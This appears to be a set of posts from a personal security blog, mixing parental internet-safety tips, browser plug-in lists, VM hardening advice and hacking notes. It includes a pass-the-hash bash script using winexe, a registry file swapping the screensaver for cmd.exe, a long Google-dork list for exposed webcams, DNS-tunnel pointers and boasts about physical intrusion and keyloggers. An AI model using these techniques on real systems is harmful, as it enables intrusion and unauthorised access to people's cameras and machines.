I want to create a new presentation called Security for Soccer Moms. I was talking to someone at work who went to a PTA event and there was a “CISSP” there who knew a lot about security and children (uhh…) So I wanted to jot this idea down, so someone can steal it or I can just have some free hits for keywords of people looking for porn.

There are a LOT of resources on this topic and I will choose to look at the free ones. Sure there are the net-nanny products that stop you from looking at porn on the internet but they are all easy to stop when your kid gets smart, and lets face it who likes to pay for something that takes up memory on likely your home vista computer to make it run even worse.

So I present My list, I will add to it over time. I make this list in dedication to all the crazy people who have kids from high school allready… yikes.

The # 1 rule I have, untill you trust your kid -never allow a computer in a private area. (that has internet) I wouldnt reccomend it anyway keep your kids in view untill they are old and you trust them. or kick them out.

• PREVENT SOCIAL ENGINERING
• This is the most effective tool to keep your children safe from scarry assholes
• Talk to your children about NOT using real facts of life, avoid putting what your dad really works for,
• dont take a picture of your house address or link to it on google maps.
• Dont publish your birth year, use a fake year.
• Dont publish your own work history or keep it vague or mess up addresses for locations (I work at boeing in spokane)
• Dont publish your last name, or put a inital only (harder to stop kids dooin this)
• If you have rules about phones, publish only cell numbers that cant be traced by normals and watch your kids bills for strange 212 numbers.
• Dont publish details on your school where possible
• set up a email for your kids to use “on social networks” only (and monitor it)
• Dont give dates when you will leave for vacation talk about it when you get home! (or I will just come steal your crap)
• I think you get the idea – just mess things up a little change on your end causes a bad guy to keep moving to someone easy. In the end it all comes down to your parent skills, a parent that says “I dont want to look at my kids site to see what they are up to” haha then why are you reading this?? There is no privacy of a 7 year old on the internet, I dont care about your hippy views. Talk to your children why you monitor the activity and when they get older put a level of trust in them and dont monitor. If they screw up then kick some ass.
• Want to scare yourself? Google your Children’s Names see what data is out there on your home, family, child…
• Also remember LOOK at your kids social pages look at history etc to see if they use myspace etc (this also applies to you and linkedin)
• Prevent MalWare
• This is just a crappy fact of life now, its very hard to stop this with out tehncical controls.
• Use a “safe browser” in a virtual machine, it works great and there are pleanty of bootable browsers (just download ubuntu) and have the kid boot up ubuntu live and use the internet. then whatever they mess up you just reboot to fix. But they still can use flash etc etc etc.
• Use a host file redirector, most kids wouldnt figure this out untill they get real smart and if they are that smart they are beyond you trying to control them with just software. Blocks Ads-Mal-X or Porn
• Use free services like openDNs which are a bit more easy to deploy
• set your firewall to use that DNS then dont allow 53 out of your network (53=DNS) and then people CANT use internet with out some more serious hacking.
• most all opesource firewalls include some ability to do the same things for blocking sites, some will even replicate what netgear etc will do and put a “block list” of words into your layer7 traffic. So if you go to a site that contains the word “boobs” it will disallow the request. (see your hardware for how to do that, as this is about free things) Just learn to leverage what you likely allready have
• these methods can all be used to block social network sites if wanted
• Tip: remember to remove the hosts file from the recent open files list, and use notepad to edit it so that you dont leave tracks of what you did.
• Time restrictions of internet use
• Kids hate homework they like myspace
• Most all opensource firewall will allow a time browsing option, the pfsence firewall will allow you to require a login like at starbucks and only allow you for a ammount of time in a time block. or you could charge your kids
• a lot of consumer routers (things you buy at bestbuy) also have this feature use what you got!

So Remember– The security of your children is also your security. The tips here are also tips for you. The more you talk about it and let them use the tools and sites they want the less they will fight you and hide things. A opensource relationship is one where everyone learns.

And no I have no children, this is all assumptions.

This document is a work in progress right now, give feedback if you think of other major issues that you have with kids or know of with kids using the internet. I will make a new section and blather on about it.

I just found a new tool on OWASP site webslayer, this tool is only w32 right now, which bites but the tool is AWESOME!

the payload generator is awesome, as well as the complex rules you can quickly define to test a site. 31337

sigh… is this the new bump key? I havent seen a hack get run into the ground by the media since the bumpkey… seriously are we just bored in the security news world?

I have a upcomming presentation in bellevue. This is my ever evolving hacking and low hanging fruit presentation, there is a fair ammount of new content its a 30 min talk to brush over the top 10 things. I wish I was DefCon Cool but untill then…

Look I even Have a Bio register here and use nca2008KK for a code

I was just in the conference trying to swipe the memory from a laptop someone left there. Problem is that I had to remove the keyboard, then I broke my little screwdriver and when I did all this I realized I forgot my can of air. Then it was too late my memory had gone muy loco

This isn’t a "holy crap my shit is 3137 h4xor pwnd" but a "wow that’s a cool hack" sort of like Xbox running Linux or an oscilloscope that can print vector graphics from pong. This would be a cool Spy trick or uber 31337 bad guy. But if you wanted to get around it. You just use encrypted file mounts. I woudl imagine that the protection on the temporary mounts is protected or you just time out unmount the encrypted mount.

A elementary way to do this is the old keylogger. Works every time. I bet you arnt checking your docking station keyboard every morning? (thankyou centas for the use of the building custodial jumpsuit for access to your office)

I think the big thing here is dont let bad guys finger your ram!

Did you see all the things that will cause problems....

http://citp.princeton.edu/memory/faq/

I do want a copy of the RAM2USB boot application they have, as that would be handy in uses other then just hacking "secret keys"

or be totally insane and check this out

Here is a cool tool (OWASP WegGoat) that will test you on your hacker skills, from 31337 to nub3 you can see where you rank, I got to the last 4 modules and I didn’t have the skillz to continue (mostly the time to keep going)

I strongly recommend that if your interested in security / web security that you check out this project and run around the site to get learned. BTW a lot of my browser plug-ins will help you pass the quizzes.

Other things to hack, wargames, de-ice distro

I wanted to make a list of browser plug-ins that I use and find quite important to security and daily ops work.

First, for IE (I accidently upgraded to 7.0 and didn't feel like un-installing the behemoth)

• Bayden Systems' TamperIE offers HTTPS form-tampering
• sort of a mac-daddy tamper application to change your post data on the fly, must have.
• Microsoft's IE Developer Toolbar
• Change values on the fly also get header info and more right away
• Microsoft's IE Powertoys for WebDevs
• was cool but appears the highlight and show source dont work with IE7, however still works for DOM data so I keep it.

Now the giant list for FireFox (where all the 31337 users are)

• AdBlockPlus
• This is like going from dial up to DSL, the internet all the sudden becomes “sweet”
• BlogJet
• This is also in my IE, its my blogger application
• DOM Inspector
• handy for webdev and de-construction
• DownloadThemAll
• I dont like to click and this is a price-less tool for saving clicks.
• GoogleBrowserSynch
• I dont like how big google is and I dont like the idea of google watching what I browse, this was just an interesting tool since I am on lots of computers, I just dont have the guts to sign-in yet.
• GoogleToolBar
• this is a must, duh.
• HttpHeaders
• handy for webdev and de-construction
• ModifyHeaders
• handy for webdev and de-construction, and user-agent mods
• NoScript
• The only “security” leo laporte knows with out steve giving him a script. Handy for hacking things.
• RefControl
• spoof the referrer to the server.
• PDF Download
• sometime I like to download pdf’s sometimes I like to view them live, this lets me choose.
• Tamper Data
• same as TemperIE but for zilla
• ULRParms
• Different type of TamperData type plugin
• User Agent Switcher
• mac-daddy agent switcher, here is my browser list in XML for import
• File Attachment: useragentswitcher.xml (9 KB)
• WebDev
• This tools is mostly a must for anyone, you can quickly shut on and off and mod parts of sites.

So I have a wamu credit card, I have nothing good to say about wamu when I activated the card, I actually yelled at them that I didnt want to buy any insurance or fraud detection service. It was worse then a girl scout that needs to make a quota. So then I went to close out the card (I used it for a 0% loan) I didnt want to call, so I set up an account online. I had to make my password. But check out the HORRIBLE password requirements. Not only do they limit to alpha 8 character, but they also give you example passwords! haha

So this topic of virtual servers is starting to catch on a bit more, I still think it will go the wayside of bluetooth and only people that drink the Intel kool-aid will adopt it, but thats just me, dont get me wrong I feel there is a place for virtual machines in the data center, the technology and use just isn't impressing me today. The real point of this post is to bring together some of the tips about virtual server security, I say virtual server and not vmware because they arnt the only players in the market, example is Virtuozzo who I was just talking with a friend about. I was listening to a pauldotcom podcast the other day (which if your interested you need to go listen to)

Anywhoo I have compiled a list of some of the top things to disable or change to harden your virtual environment. The following documents go into further detail but I wanted to explain out a few ideas. The first is disabling unused hardware, examples are FDD, CDROM, USB, and most important the NIC. Obviously you can understand the media not only will it free up resources (other tips are shut down screensavers and the K-Desktop) but they just arnt needed typically in a virtual environment. The NIC is one that most people overlook (depending on setup and how you have things configured this can be incorrect tip), they will have a virtual host with the ability to link to your LAN. now this is particularly and issue if the threat of jumping out of a virtual ever comes to light as a virus. If you have a host on a protected network and your vm’s are on a DMZ for example, then once the virtual is hacked your protected network is at risk, the amount of times that you should have to touch the host is minimal so keep the KVM attached and disable the protocalls and ip address on the host.

Next topic that ties in with the first is to keep similar security devices on the same host, and put that host in the proper subnet for the security of the virtuals. Meaning, dont put your web server on the same host as your financial server, and dont put your web server on the same as a tool server that is located in your ring 0/1 LAN. If its a DMZ server and you would have put it there physically, then put it there phys-virtually (thats physically and virtually in one word) so say this with me once again, put like security servers in the proper realm with the proper vrituals sharing a host.

Now to get a little specific to vendors, example is VMware. With VMware you have cool things like drag-and-drop file copy, cut and paste etc. In a server virtual machine you want to shut these enhancements off.

Patch! VMware, Microsoft each have patches for the softwares they produce, update and patch your software. vmware has no nice patch management notification like MicorosoftUpdate so Patch your softwares, also patch your hosts and virtuals for OS and APP patches.

VMWare has actually published a paper for security with the ESX Server, this has important tips for logs, users, and resource provisioning to prevent denial of service issues.

Also CI Security is supposed to release hardening guides, however they also publish good standards for the OS in the virtual so check them out, along with that is the Microsoft published 2000 hardening and 2003 hardening guides.

Another interesting summary from guys at Petri, specifically because they have screenshots

A “new” security threat that I thought was rather interesting. using cross site forgery, the idea is that if you have two browsers open, one is your bank the other is a hack-site. The hack site can use this idea to piggy back on your cookie and session to do things with your bank with out you knowing, How? well it would just send http post data (or get) in the back end of the browser. So whats this mean why do you care? If this takes off its nasty till’ people fix the sites you use. To not fall victim to this just dent flip browsers while your browsing, if you are on a site that you feel needs to be secure close out myspace.

Also the tool that I use for google hacking pay-sites, is the mozilla RefControl, which is the underlying idea with this hack

Found a workaround, just go to File, Open, Other Users Folder. Solves the problem for now. There is some bug with the “quick open” list that normally shows up in a toolbar on the left of outlook.

"The Messaging interface has returned an unknown error." occurs when trying to view a shared calendar

In Outlook 2007, an error may occur when trying to view a shared calendar from the People's Calendars list. The error will say "The Messaging interface has returned an unknown error.  If the problem persists, restart Outlook."  Restarting Outlook does resolve the problem.

Microsoft has confirmed that this is a known bug with Outlook 2007.  We are currently waiting to hear back from Microsoft as to the decision on whether this will be resolved by a Hot Fix or included in Office 2007 Service Pack 1.

I wanted to post a quick blurb about corporate cell phone’s and security. There are a lot of choices out there today, iphone, blackjack, windowsPDA’s, trio, nokia and finally blackberrys. in regards to all the cell phones except the blackberry the security sucks. I do know that trios have some remote erase, but if your seriously considering setting your company up with anything for cell enterprise look no further then blackberry. the amount of security that you can implement from encryption to PGP to passwords to bluetooth and camera and mass storage use is insane. yes this is a plug for Blackberry and no im not paid for it.

The hacks that people are not using today are cell hacks, hacks on iphone etc are just too juicy to not take advantage of, be aware of the threats that your ceo’s and management are purchasing on the company.

Best practice documents and full overview of IT policy is located at following blackberry kb site

another Defcon toy that is fun is what a security firm is calling sidejacking, basically your just recording a tcp stream and replaying it later, specifically what its looking for is the transmission of a cookie to the server with your password and data in it. Think pass-the-hash. The program is called hamster and is a remake of ferret and should be available now but its not from erratasecurity it will eventually be out there so just keep clicking.

Well at defcon the Medeco M3 was finally hacked to crap, with easy skriptkiddy how-to. I need to update my bumpkey presentation. Medico clip trick

From the looks of this a bump key could be used, but appears the pins would not cooperate 100% which is why they use a blank cut of the key, but the copy cut is hard to obtain thus makes the probability of the threat from co-workers gone bad a little less likely. Also since the blanks for the keyway are still "not easy to get" you will need to wait for a online retailer to sell medico bumpkeys before this is true skript kiddy, I do wonder how hard it would be to file a 9 cut key with a existing and make that work right? I am about to bust out my medico lock, this evening I will be attempting to make a bump key blank, see the problem is that I still have no way to get a blank that fits the lock 1:1 so this threat however clever, today its not a “easy hack” so if you have no defense in depth and you have a good bounty of treasure, watch out. If you have proper security this isn't really a kick in the pants today.

So some people started to really bust loose with the out of the box thinking on this one. You know how you will hit some networks where you can only get DNS? like wifi spots? Guest networks NAC subnets? Here is a little trick to get access to resources by using UDP53 add that to your pentest. The first link has source step by step hosting service and video on how to work it, the other two are just followup info.

skript kiddy help for DNS tunnel

description with code sample for the dns tunnel

full how to dns tunnel

I have made a script to demo the use of winexe with the pass the hash patch. This script is nothing more then a fast entry bash script to demo in front of people so they don't have to know linux command line to understand what is happening.

#!/bin/bash
# Name: hash_pass
# Version: .01
echo ""
echo "Demo of Passing the hash exploite with SMB and NT/LM hash"
echo ""
echo -n "paste hash in format LM_HASH:NTLM_HASH : "
read hsh
export SMBHASH=$hsh
echo -n "username and domain in format DOMAIN/user note / not \: "
read usid
echo -n "hostname or IP for use of resource: "
read hst
echo -n "command to run on host ex. cmd.exe: "
read comnd
./winexe -U $usid%foo //$hst $comnd

this is something way cool that isn't available to hacker-kiddys yet. using a tool like cache dump you can then use the hash you get to ‘run-as’ the hash user. then I can run as the user on the computer or network. this means that you don't need a Hash Table and it don't matter if its 127 character password or NT hash. Link to security blog

must find this code. – Msvctl

Update: I did my research on this and you can find tools that will show this by using the term “Passing the hash” I will detail more once I have more of a way to fix it. in a windows environment. I will also blog more once I have a good set of tools to show it off.

update: there is a copy of winexe that can be patched to pass hash and it works. I will not detail until later date but I can confirm it works the same as the blog link here.

this is all over the web but its sort of fun. google the following types of topics: specifically use google-suggest http://www.google.com/webhp?complete=1&hl=en and put in URLS you know of (example take a appliance you have and put in the /admin/blah.html and see if google will suggest it up.)

I stole the following list from another blog. But it will give you the idea of how suggest can be used to find things that people might have put online by accident.

• Axis Webcams: inurl:/view.shtml or inurl:view/index.shtml
• Cannon Webcams: sample/LvAppl/
• MOBOTIX Webcams: control/userimage.html
• FlexWatch Webcams: /app/idxas.html
• JVC Webcams: intitle: intitle:”V.Networks [Motion Picture(Java)]”

inurl:/view.shtml
intitle:”Live View / - AXIS” | inurl:view/view.shtml^
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG)
inurl:view/indexFrame.shtml
inurl:view/index.shtml
inurl:view/view.shtml
liveapplet
intitle:”live view” intitle:axis
intitle:liveapplet
allintitle:”Network Camera NetworkCamera”
intitle:axis intitle:”video server”
intitle:liveapplet inurl:LvAppl
intitle:”EvoCam” inurl:”webcam.html”
intitle:”Live NetSnap Cam-Server feed”
intitle:”Live View / - AXIS”
intitle:”Live View / - AXIS 206M”
intitle:”Live View / - AXIS 206W”
intitle:”Live View / - AXIS 210&Prime
inurl:indexFrame.shtml Axis
inurl:”MultiCameraFrame?Mode=Motion”
intitle:start inurl:cgistart
intitle:”WJ-NT104 Main Page”
intext:”MOBOTIX M1&Prime intext:”Open Menu”
intext:”MOBOTIX M10&Prime intext:”Open Menu”
intext:”MOBOTIX D10&Prime intext:”Open Menu”
intitle:snc-z20 inurl:home/
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
intitle:”sony network camera snc-p1&Prime
intitle:”sony network camera snc-m1&Prime
site:.viewnetcam.com -www.viewnetcam.com
intitle:”Toshiba Network Camera” user login
intitle:”netcam live image”
intitle:”i-Catcher Console - Web Monitor”

If your smart like me you realize what this image shows. If you log into google calendar you will have this new search feature, you will also notice what I searched for, you can be creative with the terms you use (I used passcode like conference call passcode) you now have a hacking trick or simply a great prank phone call method. – Idea spawn pauldotcom security podcast.

Social engineering at the best, also prevent this by NOT MARKING PUBLIC CALANDAR or just dont put secure information in google.

(Access Point)——Irongeek Ettercap Script———Gateway

This is something sort of fun that I just installed on my home wireless. Its actually very educational you can learn what type of code sends clear text passwords and what will not. Most interesting is using sites that attempt to prevent this type of attack and put fun data in the password fields. I installed ettercap in bridge mode so I have layer1 access to the data. (granted that ettercap did this all along this is just a fun way to show it off)

a simple trick to get elevated command line from the screen saver, there are many ways to enter this data one fast trick is to use a linux reg editor its simple as making the logon script the command window. also works to do a command line of “copy cmd.exe logon.scr” this will work anywhere  but on domain controllers not booted in recovery mode. This is preventable with PGP disk encryption.

Windows Registry Editor Version 5.00

[HKEY_USERS\.DEFAULT\Control Panel\Desktop]
"ScreenSaverIsSecure"="0"
"ScreenSaveTimeOut"="15"
"ScreenSaveActive"="1"
"SCRNSAVE.EXE"="cmd.exe"

OEM data you changed

Windows Registry Editor Version 5.00

[HKEY_USERS\.DEFAULT\Control Panel\Desktop]
"ScreenSaverIsSecure"="0"
"ScreenSaveTimeOut"="600"
"ScreenSaveActive"="1"
"SCRNSAVE.EXE"="C:\\WINDOWS\\System32\\logon.scr"

If you own a PC that the public can get to – laptop, library, corporate etc etc. Disable AutoPlay on the system via Group Policy. Do this to prevent hackers

• KB 555324
• KB 320182

The DT-2000 here to eat your data

other products by the same company

This system detects when a senile elderly patient with aimless behavior leaves the home unexpectedly. When the system detects this behavior, it activates an alarm to notify nursing personnel to secure the individual's safety. Thus, this system enhances the safety of the elderly and eases the burden of nursing care.

I was reading around the web and found this interesting document, its interviewing a buglar and talking about “where to hide your money” I point this post out because it has one fun idea, the idea that if you leave some money out that is easy to find your less likely to have your house damaged, distroyed, and potentially the crook will leave thinking he stole your good stuff.

This is a fun idea to apply to corporate security.

My first thoughts when i saw the title of the article was “ok so we print to the public how to keep your stuff safe, hide things in your toilet tank.” Now all of america will put things in the toilet tank. It has this idea to put money in your kids toys. The concept is new so crooks wont look there. But like anything once its popular its where crooks go.

I have about 30 Pod-Cast streams and I listen to about 2–4 a day regularly, I have evaluated a TON of them and my requirements are simple. They cant be dumb, Aim not a huge fan of TechTV because they tell you stupid things that i don't care about. So i try to not have casts that are like that. The other requirement is they are not slow. I don't want to hear a professor. Last i want updates in 3+ a month. Why? because security isn't a 1 month update. So here kicks off my list of security related Pod-Casts. the items in bold i feel are “essential” to your collection if your security minded. All of the podcasts can be found via Itunes search.

Blue Box VoIP – ok security related to Voip more focused on vonage and consumer then enterprise.

CNN video Daily – security includes the news so good to get a light dusting.

Crave Video – an OK review of hardware (non security)

Hack A Day – i jsut respect this site (non security)

InDigital – great video podcast about hardware (non security)

InfoWorld – good enterprise news source

MakeVideo – (non security) MakeBlog

Pauldotcom Security Weekly – great new age security cast

Security Now! – ok news for security the one host is lame.

Security Wire Weekly – good weekly news

This Week in Tech – mostly the people i dont like from other podcasts

Windows Weekly – ok news for windows.